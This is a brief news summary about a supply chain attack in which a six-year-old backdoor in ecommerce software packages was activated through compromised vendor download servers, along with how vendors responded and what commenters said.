The Digital Press

A coordinated supply chain attack has activated a six-year-old backdoor in popular ecommerce software packages, compromising between 500 and 1000 stores, including major multinational clients. The attackers gained control by injecting malicious code into vendor download servers, allowing remote code execution via fake license checks.

Why it matters: The attack impacts numerous ecommerce stores, risking customer data and transactions through compromised vendor software.

The big picture: Supply chain attacks exploit trusted software updates, posing severe risks to the entire ecommerce ecosystem.

Vendor responses: Some vendors deny breaches or fail to respond, yet continue hosting backdoored packages publicly.

Commenters say: Many highlight the critical risk of remote code execution in the backdoor and criticize vendors for poor incident response and ongoing distribution of compromised software.